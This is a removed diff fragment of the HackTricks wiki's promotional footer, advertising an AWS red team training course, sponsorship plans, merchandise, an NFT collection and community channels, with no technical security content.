-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-